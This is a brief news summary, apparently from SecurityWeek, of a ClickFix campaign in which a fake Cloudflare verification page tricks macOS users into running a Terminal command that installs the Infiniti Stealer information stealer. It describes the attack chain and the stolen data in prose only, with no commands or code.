"The attack starts with a fake CAPTCHA page that serves a legitimate-looking Cloudflare human verification page asking visitors to paste and execute a command in Terminal."
"Once the victim runs the command, a Bash script is fetched from a remote server. The script decodes an embedded payload, writes the second stage binary to a temporary folder, removes its quarantine flag, and executes it."
"The binary dropped by the script is a loader compiled using Nuitka. The compiler transforms Python code into a native binary, making static analysis more difficult."
"The Python-based information stealer targets browser credentials, Keychain information, cryptocurrency wallets, secrets stored in developer files, and screenshots captured during execution."
A new ClickFix campaign targets macOS users with a fake Cloudflare verification page that tricks them into executing malicious commands. The attack begins with a CAPTCHA page that instructs users to run a command in Terminal. This command fetches a Bash script from a remote server, which executes a loader compiled with Nuitka. The loader launches the Infiniti Stealer malware, which steals browser credentials, Keychain information, and cryptocurrency wallets, sending the data to a command-and-control server via HTTP POST requests.
Read at SecurityWeek
Unable to calculate read time
Collection
[
|
...
]